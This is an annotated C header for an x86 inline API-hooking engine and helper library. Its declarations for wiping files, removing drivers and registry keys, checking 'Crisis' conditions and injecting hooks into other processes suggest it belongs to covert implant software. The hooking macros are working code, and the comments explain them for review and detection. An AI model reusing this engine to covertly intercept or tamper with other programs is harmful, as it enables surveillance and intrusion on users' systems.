/*
 * Shared declarations for the HM_* helper library and its inline API-hooking
 * engine (x86, MSVC inline assembly).  This excerpt contains only constants,
 * type definitions, extern prototypes and macros - no function bodies - so
 * every behavioural note below is taken from the declarations themselves.
 * No include guard is visible in this excerpt; confirm one exists in the
 * full header before including it from more than one translation unit.
 */
#include #include #include "HM_SafeProcedures.h" /* the two <...> system header names were lost when this page was extracted; only the quoted include survived */

/* Buffer length for a DLL name: _MAX_PATH plus the terminator. */
#define DLLNAMELEN (_MAX_PATH + 1) // XXX could be lengthened for wide-char directories...
/* Number of bytes of the original API saved in HMCommonDataStruct.OriginalCode (see COMMONDATA below). */
#define STUB_SIZE 24
/* NOTE(review): presumably the size of the redirect written at the hooked API's entry - confirm against the hook engine. */
#define REDIR_SIZE 5
#define MARK_SEARCH_LIMIT 20 // Number of bytes in which to search for a hook's marker (see MARK_HOOK)
#define HMINBUNDLEHOOKS 0
#define MAXVIRTUALHOOK 1
/* Export name of the hook-creation routine declared further down as HM_sCreateHookA. */
#define HMSCREATEHOOK "HM_sCreateHookA"
/* Guard helpers.  IFDEF(x) is a bare `if`; VALIDPTR(x) embeds a `return 1`,
 * so it may only be used inside a function returning an integer type and
 * is not a do/while statement macro. */
#define IFDEF(x) if(x != NULL)
#define VALIDPTR(x) if(!(x)) return 1;

// Used by HM_GetDate.  Two DWORD halves of a delay; the name suggests a
// nanosecond-resolution 64-bit value split into low/high words - confirm.
typedef struct { DWORD lo_delay; DWORD hi_delay; } nanosec_time;

// Exported functions (implemented elsewhere).  Callers' ownership of any
// returned char*/WCHAR* buffer is not stated here; check the definitions.
extern void HM_InsertRegistryKey(char *, BOOL);
extern char *HM_CompletePath(char *, char *);
extern WCHAR *HM_CompletePathW(WCHAR *, WCHAR *);
extern void HM_WipeFileA(char *);
extern void HM_WipeFileW(WCHAR *);
extern void HM_RemoveRegistryKey(void);
extern void HM_RemoveDriver(); /* non-prototype declaration: argument types are unchecked */
extern void HM_RemoveCore(void);
extern BOOL HM_GetDefaultBrowser(char *);
extern BOOL HM_GetIE32Browser(char *path_name);
extern void HM_U2A(char *);
extern void HM_A2U(char *src, char *dst);
extern char *HM_memstr(char *, char *);
extern char *HM_FindProc(DWORD);
extern WCHAR *HM_FindProcW(DWORD);
extern DWORD HM_FindPid(char *, BOOL);
extern HWND HM_GetProcessWindow(char *procname);
extern BOOL HM_CheckNewConf(char *);
extern BOOL HM_GetDate(nanosec_time *);
extern char *HM_ReadClearConf(char *);
extern BOOL HM_ExpandStrings(char *source, char *dest, DWORD dsize);
extern BOOL HM_ExpandStringsW(WCHAR *source, WCHAR *dest, DWORD dsize);
extern BOOL GetUserUniqueHash(BYTE *user_hash, DWORD hash_size);
extern void IndirectCreateProcess(char *cmd_line, DWORD flags, STARTUPINFO *si, PROCESS_INFORMATION *pi, BOOL inherit);
extern void HM_CalcDateDelta(long long, nanosec_time *);
/* Project-local memmem: the name collides with the glibc/BSD extension of the same signature if this header is ever built on a POSIX toolchain. */
extern void *memmem (const void *haystack, size_t haystack_len, const void *needle, size_t needle_len);
extern BOOL HM_TimeStringToFileTime(const WCHAR *time_string, FILETIME *ftime);
extern BOOL IsLastInstance(); /* non-prototype declaration */
extern BOOL HM_HourStringToMillisecond(const WCHAR *time_string, DWORD *millisecond);
BOOL FindModulePath(char *, DWORD);
char *GetDosAsciiName(WCHAR *orig_path);

// Declared in HM_CrisisAgent.h
extern BOOL IsCrisisNetwork(void);
extern BOOL IsCrisisSystem(void);

// Also used by the date event handlers
extern nanosec_time date_delta; // Used for any adjustments applied when reading dates

// Types of the dynamically imported functions.....
//
typedef BOOL (__stdcall *FreeLibrary_T) (HMODULE);
typedef FARPROC (__stdcall *GetProcAddress_T) (HMODULE, LPCSTR);
typedef HINSTANCE (__stdcall *LoadLibrary_T) (LPCTSTR);
typedef DWORD (__stdcall *ResumeThread_T)(HANDLE);
typedef HANDLE (__stdcall *OpenThread_T)(DWORD,BOOL,DWORD);
typedef BOOL (__stdcall *CloseHandle_T)(HANDLE);
typedef int (__cdecl *atoi_t) (const char *);
typedef void (__cdecl *memcpy_t)(void *,const void *,size_t);

/////////////////////////////////////////////////////////////////
//
// Global structures
//
/////////////////////////////////////////////////////////////////

//
// Services struct
//
typedef BOOL (__stdcall *HM_IPCClientWrite_t) (DWORD, BYTE *, DWORD, DWORD, DWORD);
typedef BYTE * (__stdcall *HM_IPCClientRead_t) (DWORD);
/* Same signature as HM_sCreateHookA below. */
typedef DWORD (__stdcall *HM_sCreateHook_t) (DWORD,char*,char*,BYTE*,DWORD,BYTE*,DWORD);
typedef HANDLE (__stdcall *HM_sStartHookingThread_t)(DWORD,DWORD,BOOL,BOOL);
/* Handed to a service: the two IPC client entry points plus ten opaque
 * parameters whose meaning is service-specific and not documented here. */
typedef struct { HM_IPCClientWrite_t pHM_IpcCliWrite; HM_IPCClientRead_t pHM_IpcCliRead; DWORD PARAM[10]; }HMServiceStruct;

//
// Common prefix of every hook's data struct
// [HMCommonDataStruct pCommon]
//
/*COMMONDATA
 * char OriginalCode[STUB_SIZE]; // Stub holding the first piece of the original API
 * DWORD dwHookLen;              // Length of the hook
 * DWORD dwHookAdd;              // Address of the hook
 * DWORD dwDataAdd;              // Address of the data used by the hook
 * BYTE *bAPIAdd;                // Address of the API being hooked
 * GetProcAddress_T _GetProcAddress;
 * LoadLibrary_T _LoadLibrary
 * FreeLibrary_T _FreeLibrary
 * HM_IPCClientWrite_t pHM_IpcCliWrite;   (present in the macro, missing from the original list)
 * HM_IPCClientRead_t pHM_IpcCliRead;     (present in the macro, missing from the original list)
 *
 * OriginalCode is deliberately the FIRST member: the CALL_ORIGINAL_API
 * macros jump to the address held in pData, i.e. straight into this stub.
 * Do not reorder the members without updating those macros.
 */
#define COMMONDATA char OriginalCode[STUB_SIZE];DWORD dwHookLen;DWORD dwHookAdd;DWORD dwDataAdd;BYTE *bAPIAdd;GetProcAddress_T _GetProcAddress;LoadLibrary_T _LoadLibrary;FreeLibrary_T _FreeLibrary;HM_IPCClientWrite_t pHM_IpcCliWrite;HM_IPCClientRead_t pHM_IpcCliRead
typedef struct {COMMONDATA;} HMCommonDataStruct;

void __stdcall HM_CreateProcess(char *, DWORD, STARTUPINFO *, PROCESS_INFORMATION *, DWORD);
void __stdcall HM_CreateProcessAsUser(char *, DWORD, STARTUPINFO *, PROCESS_INFORMATION *, DWORD, HANDLE);

////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////
//
// Macro definitions for the hooks
//
////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////

/* Installs a hook.  Argument order, as used by HMMAKE_HOOK below:
 * (pid, API name, DLL name, hook address, hook length, hook data, hook data size).
 * The return value is passed through by HMMAKE_HOOK; its meaning is not stated here. */
DWORD __stdcall HM_sCreateHookA(DWORD, char *, char *, BYTE *, DWORD, BYTE *, DWORD );
typedef DWORD (__stdcall *HM_CreateHook_t)(DWORD, HMServiceStruct *, BOOL);
typedef DWORD (__stdcall *HM_CreateService_t)(DWORD, HMServiceStruct *);

// Required by the hooks.
// INIT_WRAPPER declares the local `pData` that every other hook macro relies
// on, and loads it from the immediate 69696969h.  That constant is presumably
// a placeholder patched with the real data address when the hook body is
// copied into place (see dwDataAdd) - confirm against the installer.  The
// trailing backslash is intentional; the line after it must stay empty.
#define INIT_WRAPPER(STRTYPE) STRTYPE *pData = NULL; \
    __asm MOV EBX,69696969h \
    __asm MOV DWORD PTR SS:[pData], EBX \

// Marks the hooks with jumps to the next instruction (EB 00 EB 00, two
// `jmp short $+2`).  This is a fixed, non-functional byte pattern that the
// engine locates within MARK_SEARCH_LIMIT bytes; being constant, it is also
// what an analyst or scanner can key on to find hook bodies in memory.
#define MARK_HOOK __asm _emit 0xEB \
    __asm _emit 0x00 \
    __asm _emit 0xEB \
    __asm _emit 0x00

// Re-invokes the original API from inside a hook and stores its EAX in a
// freshly declared `ret_code`.  What the assembly does:
//   EBX <- pData (start of the COMMONDATA block, i.e. OriginalCode);
//   copies ARGS_N DWORDs from [EBP+8] (the hook's own incoming arguments -
//   this assumes a standard EBP frame, so it breaks under frame-pointer
//   omission) onto a newly reserved stack area; CALL EBX.
// No ADD ESP follows the call, so the reserved area is presumably balanced by
// a __stdcall callee cleaning its own arguments - confirm for every hooked
// API.  Clobbers EBX, ESI, EDI, ECX and ESP relative state.  ARGS_N is
// substituted into assembly twice and must be a plain integer constant.
#define CALL_ORIGINAL_API(ARGS_N) DWORD ret_code = 0; \
    __asm MOV EBX, DWORD PTR SS:[pData] \
    __asm LEA ESI, DWORD PTR SS:[EBP+8] \
    __asm MOV EDI, ARGS_N \
    __asm SHL EDI, 2 \
    __asm SUB ESP, EDI \
    __asm MOV EDI, ESP \
    __asm MOV ECX, ARGS_N \
    __asm REP MOVSD \
    __asm CALL EBX \
    __asm MOV DWORD PTR SS:[ret_code], EAX

// Same as CALL_ORIGINAL_API but does not declare `ret_code`; for a second
// call in a scope where CALL_ORIGINAL_API already declared it.
#define CALL_ORIGINAL_API_SEQ(ARGS_N) __asm MOV EBX, DWORD PTR SS:[pData] \
    __asm LEA ESI, DWORD PTR SS:[EBP+8] \
    __asm MOV EDI, ARGS_N \
    __asm SHL EDI, 2 \
    __asm SUB ESP, EDI \
    __asm MOV EDI, ESP \
    __asm MOV ECX, ARGS_N \
    __asm REP MOVSD \
    __asm CALL EBX \
    __asm MOV DWORD PTR SS:[ret_code], EAX

// "if (wide string x equals narrow string pData->y)".
// x is indexed as x[i*2], i.e. treated as a byte pointer into a UTF-16
// buffer, and only the LOW byte of each code unit is compared against the
// narrow pData->y - the high byte is never examined, so any wide character
// whose low byte matches is accepted.  The do/while also compares the
// terminator position, so a shorter x is rejected.  Expands to statements
// that declare `is_equal` and `i`: using it twice in one scope is a
// redeclaration error, and x is evaluated several times.
#define IF_WSTRCMP(x,y) BOOLEAN is_equal;\
    is_equal = TRUE;\
    if (x) {\
        DWORD i = 0;\
        do {\
            if (x[i*2] != pData->y[i]) {\
                is_equal = FALSE;\
                break;\
            }\
        } while (pData->y[i++]);\
    } else is_equal = FALSE;\
    if (is_equal)

// Length-bounded variant of IF_WSTRCMP: compares at most z characters and,
// because of the final `if (i!=z)`, is equal ONLY when pData->y is exactly z
// characters long (shorter or longer y both fail).  Same low-byte-only
// comparison and same single-use-per-scope restriction as IF_WSTRCMP.
#define IF_LSTRCMP(x,y,z) BOOLEAN is_equal;\
    is_equal = TRUE;\
    if (x) {\
        DWORD i = 0;\
        while(pData->y[i]) {\
            if (i>=z) { \
                is_equal = FALSE;\
                break;\
            } \
            if (x[i*2] != pData->y[i]) {\
                is_equal = FALSE;\
                break;\
            }\
            i++; \
        }\
        if (i!=z) is_equal = FALSE; \
    } else is_equal = FALSE;\
    if (is_equal)

// Runs SETUPADD(OPTPARAM) and, only if it returns zero, calls
// HM_sCreateHookA with the pid, API name, DLL name, hook address, the
// length stored in HOOKDATA.dwHookLen, and HOOKDATA itself as the hook data.
// Evaluates to 0 when setup returns non-zero (so 0 cannot distinguish "setup
// declined" from whatever HM_sCreateHookA returns).  Note the macro parameter
// order (HOOKADD before DLLNAME) differs from the call's argument order, and
// the expansion already ends in `;`.
#define HMMAKE_HOOK(DWPID, APINAME, HOOKADD, HOOKDATA, SETUPADD, OPTPARAM, DLLNAME) (SETUPADD(OPTPARAM) ? 0 : \
    HM_sCreateHookA(DWPID, APINAME, DLLNAME, (BYTE *)HOOKADD, HOOKDATA.dwHookLen, (BYTE *)&HOOKDATA, sizeof(HOOKDATA)));

HANDLE GetMediumLevelToken(); /* non-prototype declaration */
/* stray character left by page extraction; not part of the original header */
.